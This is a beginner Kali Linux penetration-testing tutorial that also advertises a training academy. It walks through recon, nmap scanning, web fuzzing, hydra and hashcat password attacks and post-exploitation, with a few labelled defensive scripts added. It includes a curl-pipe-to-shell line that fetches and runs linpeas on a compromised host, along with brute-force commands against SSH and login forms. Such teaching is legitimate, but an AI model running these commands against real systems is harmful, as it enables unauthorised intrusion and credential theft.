If you have ever wanted to understand how attackers think, how systems get compromised, and how defenders can stay one step ahead, Kali Linux is where that journey begins. Built specifically for penetration testing and digital forensics, Kali is the industry-standard platform used by security professionals worldwide. This guide walks you through setting it up, understanding its core tools, and executing your first real-world recon and enumeration workflows.
Kali Linux is a Debian-based distribution maintained by Offensive Security. It ships with over 600 pre-installed security tools covering every phase of a penetration test, from reconnaissance through exploitation and post-exploitation. Unlike a general-purpose Linux distro, Kali is purpose-built: its kernel is patched for wireless injection support, its package repositories are security-focused, and its default environment is designed for offensive security workflows.
Professionals use Kali because it eliminates setup friction. Every serious tool is already there, properly configured, and maintained. For a beginner, that means you spend your time learning techniques rather than debugging dependencies.
For most beginners, running Kali as a virtual machine is the safest and most flexible approach. Download the pre-built VM image from the official Kali website, import it into VirtualBox or VMware, and you are operational within minutes.
Key settings to configure after import:
Installing Kali directly on hardware gives you full access to your network interface card, which matters for wireless security testing where drivers need direct hardware access. Use the standard installer ISO and follow the disk partitioning wizard. A dual-boot configuration alongside your primary OS is common in professional setups.
Kali is available through WSL2 on Windows 10 and 11. This option is convenient for command-line tooling and scripting practice, though it lacks full kernel support for tasks like raw packet injection. Install it with:
wsl --install -d kali-linux
After launch, install the default tool metapackage:
sudo apt update && sudo apt install -y kali-linux-default
Before running any tools, get oriented with the directory structure you will use constantly:
The most important directory for beginners is /usr/share/wordlists/. Run the following to extract and explore the default wordlist collection:
ls /usr/share/wordlists/
gzip -d /usr/share/wordlists/rockyou.txt.gz
wc -l /usr/share/wordlists/rockyou.txt
That last command will show you over 14 million password entries, which gives you an immediate sense of what offline password cracking involves in practice.
Penetration testing follows a structured methodology. The first phase is reconnaissance, gathering information about your target without directly touching their systems. This is where open-source intelligence (OSINT) tools come in.
theHarvester pulls publicly available data from search engines, DNS records, and threat intelligence sources:
theHarvester -d targetdomain.com -b google,bing,dnsdumpster,crtsh -l 200
This command queries Google, Bing, DNSDumpster, and Certificate Transparency logs for emails, subdomains, and associated hostnames tied to targetdomain.com. The -l 200 flag limits results to 200 entries per source.
recon-ng is a full-featured reconnaissance framework with a modular architecture. Think of it as a purpose-built OSINT workspace:
recon-ng
[recon-ng][default] > workspaces create client_engagement
[recon-ng][client_engagement] > marketplace install all
[recon-ng][client_engagement] > modules load recon/domains-hosts/hackertarget
[recon-ng][client_engagement] > options set SOURCE targetdomain.com
[recon-ng][client_engagement] > run
The hackertarget module queries the HackerTarget API for host records. As you build your skills, you will layer multiple modules together, feeding output from one directly into the next, which is the core workflow of professional OSINT operators.
If you want structured training on how reconnaissance fits into full penetration test engagements, the courses at Redfox Cybersecurity Academy walk through each phase with hands-on lab exercises designed for real-world skill development.
Once passive recon establishes a target profile, active scanning maps the live attack surface. Nmap is the gold standard for network discovery and port scanning.
A basic TCP SYN scan against a target host:
sudo nmap -sS -T4 -p- 192.168.1.100
Breaking this down: -sS runs a stealthy SYN scan (it needs raw socket access, so run it as root or under sudo), -T4 sets an aggressive timing template for speed, and -p- scans all 65,535 ports rather than just the default top 1,000.
For service version detection and default script execution:
sudo nmap -sV -sC -O -A 192.168.1.100 -oN scan_output.txt
The flags here do significant work: -sV detects service versions, -sC runs the default Nmap Scripting Engine (NSE) scripts, -O attempts OS fingerprinting (which, like SYN scanning, needs root privileges), -A enables aggressive mode combining all three, and -oN saves output to a file. Every professional engagement starts with output like this saved and organized.
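Saved -oN output is only useful once it is organized. The script below is an added example, not code from the original post: it turns a constructed scan_output.txt excerpt (the host, ports and versions are made up) into CSV rows of open ports so results from many hosts can be merged, sorted and diffed between scans.

```shell
#!/bin/bash
# Constructed excerpt of "nmap -sV -oN" normal output for a lab host (not a real scan).
SCAN_OUT="$(mktemp)"
cat > "$SCAN_OUT" <<'EOF'
# Nmap 7.94 scan initiated Mon Mar  3 10:00:00 2025 as: nmap -sV -oN scan_output.txt 192.168.1.100
Nmap scan report for 192.168.1.100
Host is up (0.00042s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http        Apache httpd 2.4.52 ((Ubuntu))
139/tcp  open     netbios-ssn Samba smbd 4.6.2
445/tcp  open     netbios-ssn Samba smbd 4.6.2
8080/tcp filtered http-proxy
# Nmap done at Mon Mar  3 10:05:00 2025 -- 1 IP address (1 host up) scanned in 300.12 seconds
EOF

# open_ports FILE
# Turns -oN output into "host,port,proto,service,version" CSV, one row per
# open port. Filtered/closed ports are skipped; the host is taken from the
# "Nmap scan report for" line (works for "name (ip)" as well as bare ip).
open_ports() {
    awk '
        /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host) }
        /^[0-9]+\/(tcp|udp) +open / {
            split($1, p, "/")
            version = ""
            for (i = 4; i <= NF; i++) version = version (i > 4 ? " " : "") $i
            printf "%s,%s,%s,%s,%s\n", host, p[1], p[2], $3, version
        }
    ' "$1"
}

# open_port_count FILE: number of open ports, a quick sanity check per host
open_port_count() { open_ports "$1" | wc -l | tr -d ' '; }

open_ports "$SCAN_OUT"
```

Run it once per saved scan and concatenate the CSVs; a later scan of the same host can then be compared with a plain diff to spot newly exposed services.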
NSE scripts let you probe specific vulnerabilities and misconfigurations directly from Nmap:
# Check for SMB vulnerabilities (pattern quoted so the shell does not expand the *)
nmap --script 'smb-vuln*' -p 445 192.168.1.100
# Enumerate HTTP methods and headers
nmap --script http-methods,http-headers -p 80,443 192.168.1.100
# Brute-force SSH with a custom wordlist
nmap --script ssh-brute --script-args userdb=/usr/share/wordlists/metasploit/unix_users.txt 192.168.1.100
NSE has over 600 scripts covering authentication, brute forcing, discovery, exploitation, and fuzzing. Learning to search and apply them is a core Kali skill.
A significant portion of modern penetration testing focuses on web applications. Kali ships with several purpose-built web assessment tools.
gobuster is a fast, concurrent directory and file brute-forcer written in Go:
gobuster dir \
-u https://target.com \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,txt,bak \
-t 50 \
-o gobuster_results.txt
The -x flag appends file extensions to every wordlist entry, uncovering backup files and configuration scripts that developers sometimes leave accessible. The -t 50 flag runs 50 concurrent threads for speed.
ffuf (Fuzz Faster U Fool) is a highly flexible fuzzer that handles subdomain enumeration, parameter fuzzing, and virtual host discovery:
# Subdomain enumeration
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u https://FUZZ.targetdomain.com \
-mc 200,301,302 \
-o ffuf_subdomains.json \
-of json
# Parameter fuzzing on a login endpoint
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-u https://target.com/login?FUZZ=test \
-mc 200 \
-fs 1234
The -fs flag filters responses by size, which helps you cut through false positives by ignoring responses that match the default error page length.
Web application security is one of the most in-demand specializations in the field today. The Redfox Cybersecurity Academy curriculum includes dedicated modules on web exploitation techniques, giving you guided practice on realistic targets rather than guessing your way through.
hydra is the go-to tool for testing authentication on live network services:
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4 -V
# HTTP POST form login
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
192.168.1.100 http-post-form \
"/login.php:username=^USER^&password=^PASS^:Invalid credentials" \
-V -f
The -f flag stops the attack on the first valid credential found, which is standard practice during time-limited engagements. The HTTP POST module requires you to specify the form path, the parameter names, and the failure string that indicates a failed login.
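The hydra SSH run above leaves an unmistakable trace in the target's sshd log. As an added example written from the defender's side (not code from the original post), this script counts failed-password events per source address in a constructed auth.log excerpt, flags sources over a threshold, and reports how many distinct usernames each tried, which separates a single-account brute force from password spraying.

```shell
#!/bin/bash
# Constructed sshd entries in /var/log/auth.log format (not real data):
# one source hammering "admin" plus one try at "root", and a user who
# mistyped once and then logged in normally.
SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
Mar  3 10:01:02 lab sshd[1201]: Failed password for admin from 203.0.113.7 port 51234 ssh2
Mar  3 10:01:02 lab sshd[1202]: Failed password for admin from 203.0.113.7 port 51235 ssh2
Mar  3 10:01:03 lab sshd[1203]: Failed password for admin from 203.0.113.7 port 51236 ssh2
Mar  3 10:01:03 lab sshd[1204]: Failed password for admin from 203.0.113.7 port 51237 ssh2
Mar  3 10:01:04 lab sshd[1205]: Failed password for invalid user root from 203.0.113.7 port 51238 ssh2
Mar  3 10:01:05 lab sshd[1206]: Failed password for admin from 203.0.113.7 port 51239 ssh2
Mar  3 10:02:10 lab sshd[1210]: Failed password for alice from 192.0.2.44 port 40000 ssh2
Mar  3 10:02:30 lab sshd[1211]: Accepted password for alice from 192.0.2.44 port 40001 ssh2
Mar  3 10:03:00 lab sshd[1212]: Accepted publickey for bob from 192.0.2.45 port 40002 ssh2
EOF

# flag_bruteforce LOGFILE THRESHOLD
# Prints "ip failures distinct_users" for every source with at least
# THRESHOLD failed password attempts, busiest first. Many failures against
# one user looks like hydra -l; many users from one source looks like spraying.
flag_bruteforce() {
    awk -v thr="$2" '
        /sshd\[[0-9]+\]: Failed password for / {
            user = $0
            sub(/.*Failed password for (invalid user )?/, "", user)
            sub(/ from .*/, "", user)
            ip = ""
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); break }
            fails[ip]++
            if (!((ip SUBSEP user) in seen)) { seen[ip SUBSEP user] = 1; users[ip]++ }
        }
        END { for (ip in fails) if (fails[ip] >= thr) print ip, fails[ip], users[ip] }
    ' "$1" | sort -k2,2nr
}

flag_bruteforce "$SAMPLE_LOG" 5
```

Run against the real /var/log/auth.log (or journalctl -u ssh output) on the lab target while hydra runs to see the -t 4 parallelism show up as bursts of failures within the same second.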
When you recover hashed credentials from a database dump or a system file, hashcat handles offline cracking at GPU-accelerated speeds:
# Identify hash type first with hashid
hashid '$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi'
# Crack bcrypt hashes using rockyou
hashcat -m 3200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
# Dictionary + rules attack for better coverage
hashcat -m 0 -a 0 md5_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
The -m flag specifies hash mode (3200 for bcrypt, 0 for MD5), -a 0 selects dictionary attack mode, and the -r flag applies transformation rules that mutate wordlist entries, so a password like Password123! is caught even if only the base word password is in the list.
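To see why rules like best64 matter from the defender's side, the following added example (not part of the original post) reverses the common mutations, trailing digits and symbols, capitalisation and leet substitutions, and rejects any candidate whose base word appears in a small constructed wordlist standing in for rockyou.txt.

```shell
#!/bin/bash
# Constructed mini wordlist standing in for rockyou.txt (not real data).
WORDLIST="$(mktemp)"
printf '%s\n' password welcome letmein dragon sunshine monkey > "$WORDLIST"

# normalize_candidate PASSWORD
# Undo the mutations rule files such as best64 apply: strip trailing digits
# and symbols, lowercase, and reverse common leet substitutions
# (@->a, $->s, 0->o, 1->l, 3->e, 5->s, 7->t).
normalize_candidate() {
    printf '%s' "$1" \
        | sed -E 's/[0-9[:punct:]]+$//' \
        | tr 'A-Z' 'a-z' \
        | tr '@$01357' 'asolest'
}

# is_weak_mutation PASSWORD WORDLIST
# Exit 0 (weak) when the normalized base word is in WORDLIST, or when nothing
# is left after stripping, i.e. the password was digits and symbols only.
is_weak_mutation() {
    base="$(normalize_candidate "$1")"
    [ -z "$base" ] && return 0
    grep -qxF -- "$base" "$2"
}

# check_policy WORDLIST PASSWORD...: prints one verdict per candidate
check_policy() {
    wl="$1"; shift
    for pw in "$@"; do
        if is_weak_mutation "$pw" "$wl"; then
            printf 'WEAK  %s (base: %s)\n' "$pw" "$(normalize_candidate "$pw")"
        else
            printf 'OK    %s\n' "$pw"
        fi
    done
}

check_policy "$WORDLIST" 'Password123!' 'P@ssw0rd' 'Dragon2024' 'w3lcome2023' 'vqf-stapler-9x'
```

Point WORDLIST at the real rockyou.txt to turn this into a usable pre-registration check; anything it flags is exactly what a dictionary-plus-rules run would recover first.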
Understanding what happens after initial access is critical for both offensive operators and defenders. Even at the beginner level, you should be familiar with the core post-exploitation workflow.
linpeas.sh is a shell script that automates enumeration of local privilege escalation vectors on a compromised Linux host:
# Download and run directly (on target machine)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or transfer and run with color output
chmod +x linpeas.sh
./linpeas.sh | tee linpeas_output.txt
LinPEAS checks for SUID binaries, writable cron jobs, weak sudo permissions, misconfigurations in services, and hundreds of other escalation vectors. The color-coded output highlights critical findings in red so you can triage quickly.
Once inside a network, mapping internal systems manually keeps your footprint small:
# Discover live hosts on the local subnet without DNS resolution (-n)
nmap -sn -n 10.10.10.0/24 --exclude 10.10.10.1
# ARP scan for stealthy local discovery (needs raw socket access)
sudo arp-scan --localnet
# Check outbound connectivity from the foothold
curl -s https://ifconfig.me
These techniques reflect what real penetration testers do during internal network assessments. Building this muscle memory early will serve you well as your skills grow.
No tool in this post should ever be used against systems you do not own or have explicit written permission to test. Building a local lab is the correct way to practice all of these techniques legally and safely.
A practical beginner lab setup on a single machine:
Setting up DVWA with Docker:
docker pull vulnerables/web-dvwa
docker run -d -p 80:80 vulnerables/web-dvwa
Access DVWA at http://localhost after the container starts. Log in with admin/password, initialize the database, and set the security level to Low to start experimenting with SQL injection, XSS, file upload vulnerabilities, and more.
Building on a strong home lab foundation and pairing it with structured coursework accelerates your progress dramatically. The hands-on courses at Redfox Cybersecurity Academy are built around this methodology, combining guided instruction with practical exercises that mirror real engagements.
A few configuration changes make Kali significantly more usable for ongoing work:
# Keep your toolset current
sudo apt update && sudo apt full-upgrade -y
# Install SecLists for comprehensive wordlist coverage
sudo apt install seclists -y
# Install additional useful tools not in the default package
sudo apt install gobuster feroxbuster evil-winrm netexec -y
# Set up tmux for terminal session management
sudo apt install tmux -y
cp /usr/share/doc/tmux/examples/screen-keys.conf ~/.tmux.conf
tmux in particular is a workflow multiplier. It lets you split your terminal into panes, keep long-running scans in the background, and maintain session persistence over SSH connections. Most professional testers consider it indispensable.
Kali Linux is not magic, and the tools it contains are only as effective as the practitioner behind them. What separates a skilled penetration tester from someone who just runs scripts is the ability to understand what each tool actually does, why its output matters, and how to chain findings together into a coherent attack narrative.
The path from beginner to competent practitioner runs through deliberate practice: building lab environments, working through structured training, and consistently exposing yourself to new techniques and scenarios. The reconnaissance, scanning, web enumeration, password attack, and post-exploitation workflows covered here represent the foundational skeleton of that skillset.
If you are ready to move beyond tutorials and into structured, hands-on ethical hacking education, Redfox Cybersecurity Academy offers comprehensive courses across penetration testing, web application security, and network exploitation, all built for practitioners who want skills that transfer directly to professional engagements.